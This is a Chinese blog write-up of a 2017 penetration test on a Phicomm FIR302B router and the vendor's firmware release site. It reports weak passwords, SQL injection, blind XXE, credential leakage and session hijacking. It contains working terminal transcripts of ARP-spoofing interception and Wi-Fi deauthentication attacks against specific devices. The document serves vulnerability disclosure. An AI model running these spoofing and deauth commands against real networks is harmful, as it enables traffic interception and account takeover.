对斐讯Fir302B路由器进行的渗透测试
铁匠发表于 2017-01-03 01:40:44
0×00 固件发布站弱口令+sql注入
fir302b的板子还是比较友好的,拆开能直接看到GND TX RX VCC,虽然没有针脚。
我手头只有一块ttl开发板和三根杜邦线,直接连上UART:
自检结束后,能看到两处post请求,把当前的设备指纹信息、终端账号密码、云账号密码发送到了一个地址
这个url是一个固件发布站,后台存在弱口令
在查询工号处存在注入
昨天测试的时候,发现还有个spring框架的任意文件读取漏洞,今天已经修了
0×01 固件发布站SOAP-based blind xxe
抓路由器的数据包看一下完整的请求
root@kali:~# nmap -T4 -O 10.8.5.* -vv Nmap scan report for 10.8.5.232 Host is up, received arp-response (-0.076s latency). All 1000 scanned ports on 10.8.5.232 are filtered because of 1000 no-responses MAC Address: F0:EB:D0:54:43:E6 (Shanghai Feixun Communication Co.) Too many fingerprints match this host to give specific OS details TCP/IP fingerprint: SCAN(V=6.49BETA4%E=4%D=11/14%OT=%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=F0EBD0%TM=58295455%P=x86_64-pc-linux-gnu) SEQ(II=I) U1(R=N) IE(R=Y%DFI=N%TG=40%CD=S) root@kali:~# traceroute baidu.com traceroute to baidu.com (111.13.101.208), 30 hops max, 60 byte packets 1 10.8.5.1 (10.8.5.1) 10.091 ms 10.522 ms 10.715 ms root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward root@kali:~# arpspoof -i eth0 -t 10.8.5.1 10.8.5.232 ... root@kali:~# arpspoof -i eth0 -t 10.8.5.232 10.8.5.1 ... root@kali:~# tcpdump -i eth0 -w victim.pcap -vv tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes ^C905 packets captured 905 packets received by filter 0 packets dropped by kernel
这里是因为用的交换机,直接混杂模式抓不到包
那么扫上层网段得到路由器IP,然后找到网关,双向欺骗后,重启路由器,tcpdump抓包,等待路由器自检结束
wireshark过滤http请求得到完整数据包
发现能自定义DTD,能加载外部实体:
那么 读一下/var/log/messages
0×02 认证会话劫持漏洞
说起来这算是为了防御arp嗅探泄露cookie而产生的一种漏洞
简单的测试了一下,deauth中断client连接后,session没有立即失效,伪造client mac地址即可进入路由器
root@kali:~# airmon-ng check kill
Killing these processes:
PID Name
1222 wpa_supplicant
root@kali:~# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:12 errors:0 dropped:0 overruns:0 frame:0
TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:720 (720.0 B) TX bytes:720 (720.0 B)
root@kali:~# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Centrino Ultimate-N 6300 (rev 3e)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
root@kali:~# airodump-ng wlan0mon -w picTemp/wifi.csv
CH 1 ][ Elapsed: 12 s ][ 2016-11-03 14:37
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:EB:D0:54:43:E7 -18 9 2 0 11 54e WPA2 CCMP PSK PHICOMM_5443E7
3C:8C:40:49:3D:90 -29 3 3 0 1 54e. OPN mxxz-chinaunicom
B0:68:B6:F8:A6:18 -30 14 0 0 8 54e. WPA2 CCMP PSK moresecret
D4:EE:07:2B:BE:02 -48 24 3 0 9 54e WPA2 CCMP PSK moresec
22:C0:90:A8:12:83 -45 23 0 0 6 54e. WPA2 CCMP PSK LieBaoWiFi355
root@kali:~# airodump-ng wlan0mon --bssid F0:EB:D0:54:43:E7 -c 11
CH 7 ][ Elapsed: 36 s ][ 2016-11-03 14:48
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:EB:D0:54:43:E7 -19 26 3 0 11 54e WPA2 CCMP PSK PHICOMM_5443E7
BSSID STATION PWR Rate Lost Frames Probe
F0:EB:D0:54:43:E7 30:F7:72:41:91:2B -38 0 - 1 23 15
root@kali:~# aireplay-ng -0 0 -a F0:EB:D0:54:43:E7 -c 30:F7:72:41:91:2B wlan0mon
15:04:05 Waiting for beacon frame (BSSID: F0:EB:D0:54:43:E7) on channel 11
15:04:06 Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [13|60 ACKs]
15:04:06 Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [25|48 ACKs]
15:04:07 Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [ 0| 0 ACKs]
15:04:07 Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [54| 7 ACKs]
15:04:08 Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [56| 0 ACKs]
15:04:09 Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [55| 0 ACKs]
几乎是全站静态,密码base64后硬编码在页面中
0×03 广告
此外,影武者实验室长期招猥琐的渗透测试,有经验的安全研究员,以及激灵的小鲜肉实习生。有兴趣请联hr@moresec.cn。